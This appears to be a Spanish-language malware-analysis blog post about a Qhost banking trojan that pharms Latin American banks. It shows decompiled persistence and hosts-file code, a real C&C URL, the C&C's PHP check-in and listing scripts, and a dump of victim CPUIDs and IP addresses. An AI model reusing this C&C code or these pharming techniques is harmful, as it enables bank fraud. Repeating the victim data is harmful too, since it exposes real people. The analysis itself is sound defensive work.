lunes, 3 de febrero de 2014

Qhost - Facebook.exe


Hoy les traigo este pequeño troyano Qhost, que realiza pharming local a distintas entidades bancarias latinoamericanas. Este caso me lo envió Xylit0l, así que todos los créditos son para el que me lo entrego servido en bandeja. Gracias Xyli!


Descarga de la amenaza



Analisis en VT con una detección alta por parte de los A.V.





El troyano no tiene capa de ofuscación.



El troyano se copia a la carpeta de windows\temp con el nombre cftmon.exe


   loc_00402781: FileCopy var_18, CStr(Environ("TMP") & "\cftmon.exe")

Persistencia en el sistema.

  loc_00403275: var_3C = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\" & var_18



Es un troyano muy simple, se comunica con el C&C vía distintos PHP, y estos escriben en archivos de texto.


Public Sub Proc_0_3_4028B0
  loc_004028D2: var_8 = &H4011C8
  loc_00402913: var_3C = "http://www.volkanakyildiz.com/galeri/WebPanel/prueba.php"
  loc_0040291D: var_34 = "http://www.volkanakyildiz.com/galeri/WebPanel/host.txt"
  loc_00402923: Proc_00402AF0(var_60, edx, ecx)
  loc_00402934: var_78 = "\drivers\etc\hosts"
  loc_0040293B: var_80 = 8
  loc_00402942: var_70 = var_60 & "\drivers\etc\hosts"
  loc_00402949: var_60 = "\drivers\etc\hosts"




PHP donde reporta el Troyano

 $Fileusers="users.txt";
 $contador="contador.txt";



  if( $_POST["Datos"] )
  {
  $pDatos=$_POST["Datos"];
     list($ID,$OS)=explode("|",$pDatos);
 
//Leemos
$hfileuser = fopen($Fileusers, "r");
//Almacenamos
$Udatos = fread($hfileuser, filesize($Fileusers));
// Cerramos 
fclose($hfileuser);
if (strpos($Udatos, $ID) === false){
 Escribir($ID,$OS);
 Contador();
echo "El No existe Lo escribo";   //Si no Existe el IDE llamo a escribir
}
  }
  

function Escribir($uID,$uOS){
 global $Fileusers;
 //CPUID=gerg34534;OS=Windows 7;IP=124.1234.2342.213
$IP=$_SERVER["REMOTE_ADDR"];
$hfile= fopen($Fileusers, "a+");
$r= fwrite($hfile,"CPUID=" . $uID . ";OS=" . $uOS . ";IP=" . $IP . PHP_EOL);
fclose($hfile);

 }

  function Contador(){
  global $contador;
 // Abrimos el archivo para solamente leerlo (r de read)
$abre_visitas = fopen($contador, "r");
// Leemos el contenido del archivo
$total = fread($abre_visitas, filesize($contador));
// Cerramos el archivo
fclose($abre_visitas);

// Abrimos nuevamente el archivo
$abre_visitas = fopen($contador, "w");
// Sumamos 1 nueva visita
$total = $total + 1;

// Y reemplazamos por la nueva cantidad de visitas 
$grabar_visitas = fwrite($abre_visitas, $total);
// Cerramos la conexión al archivo
fclose($abre_visitas);

 }

?>



Panel de Login del Comando y Control



Panel donde el botmaster cargara el archivo host para el pharming, este panel no esta securizado, se puede acceder directamente sin pasar por el login... cosa de locos...



Shell que se subió al sitio comprometido para tomar el control del servidor.


El listado de usuarios infectados se encuentra en un archivo txt (usuarios.txt)

PHP el cual lista los usuarios:


$inputfile = file("users.txt");

$data_lines = array();
foreach ($inputfile as $line)
{
    $data_lines[] = explode(";", $line);
}

//Get column headers.
$first_line = array();
foreach ($data_lines[0] as $dl)
{
    $first_line[] = explode("=", $dl);
}
$headers = array();
foreach ($first_line as $fl)
{
    $headers[] = $fl[0];
}

Listado

CPUID=;OS=Windows 7 Enterprise;IP=122.166.231.83
CPUID=;OS=Windows 7 Enterprise;IP=122.166.231.83
CPUID=0FABFBFF000206D7;OS=Microsoft Windows XP;IP=4.31.163.2
CPUID=0FABFBFF000106A5;OS=Microsoft Windows XP;IP=4.31.163.2
CPUID=BFEBFBFF0001067A;OS=Windows 7 Ultimate;IP=181.160.123.96
CPUID=BFEBFBFF0001067A, BFEBFBFF0001067A;OS=Microsoft Windows XP;IP=186.34.14.218
CPUID=3FEBF9FF00000F12;OS=Microsoft Windows XP;IP=181.160.22.215
CPUID=BFE9FBFF000006EC;OS=Windows 7 Professional;IP=179.56.32.63
CPUID=BFE9FBFF000106CA;OS=Microsoft Windows XP;IP=201.239.140.115
CPUID=078BFBFD00000623;OS=Microsoft Windows XP;IP=66.129.99.119
CPUID=078BFBFF00020FC2;OS=Microsoft Windows XP;IP=186.104.202.117
CPUID=078BFBFF00100F62;OS=Microsoft Windows XP;IP=190.101.28.187
CPUID=078BFBFD00000F61;OS=Microsoft Windows XP;IP=66.187.149.88
CPUID=BFEBFBFF000306A9;OS=Windows 7 Enterprise;IP=163.247.60.12
CPUID=0383F9FF00000673;OS=Microsoft Windows XP;IP=143.215.130.105
CPUID=078BFBFF00100F63;OS=Windows 8 Pro;IP=190.44.82.162
CPUID=078BFBFF00100F23;OS=Microsoft Windows XP;IP=72.12.209.146
CPUID=BFEBFBFF00020652;OS=Microsoft Windows XP;IP=186.9.71.164
CPUID=BFEBFBFF00000F65;OS=Microsoft Windows XP;IP=186.104.236.120
CPUID=;OS=Microsoft Windows XP;IP=176.31.181.165
CPUID=BFEBFBFF000006FD;OS=Microsoft Windows XP;IP=200.14.137.67
CPUID=178BFBFF00500F20;OS=Windows 8 Single Language;IP=190.22.78.182
CPUID=0781ABF900000633;OS=Microsoft Windows XP;IP=66.249.82.231
CPUID=BFEBFBFF000206A7;OS=Windows 7 Professional;IP=181.73.97.84
CPUID=;OS=Microsoft Windows XP;IP=216.232.78.104
CPUID=;OS=Microsoft Windows XP;IP=194.94.127.23
CPUID=BFEBFBFF000106CA;OS=Windows 7 Starter;IP=186.104.131.128
CPUID=;OS=Microsoft Windows XP;IP=66.215.81.155
CPUID=BFEBFBFF000006F2;OS=Microsoft Windows XP;IP=200.104.168.40
CPUID=078BFBFF00600F12;OS=Windows 7 Professional N;IP=122.166.184.37
CPUID=0F8BFBFF000006FB;OS=Microsoft Windows XP;IP=95.26.62.147
CPUID=;OS=Microsoft Windows XP;IP=216.232.78.104
CPUID=;OS=Windows 7 Professional;IP=74.55.187.42
CPUID=;OS=Microsoft Windows XP;IP=74.55.187.42
CPUID=BFEBFBFF000006F2, 0000000000000000;OS=Microsoft Windows XP;IP=187.133.146.104


Como puede verse no son muchos los usuarios infectados, quizás por la taza de detección por parte de los antivirus .

Zip encontrado en el servidor con el kit del panel del comando y control.





Es todo por el momento.

@Dkavalanche 2014



1 comentario:

JRJRJR dijo...

¿Las IPs son reales o inventadas? El día 14 de marzo de 2014 recibí un ataque en mi correo electronico de outlook. Se enviaron correos desde mi correo y al revisar el codigo fuente vi que fueron enviados desde la ip 66.129.99.119 (ip que sale ahi escrita)...

 Hola, me mudé a medium .... nos vemos!!! FELIZ 2022!!!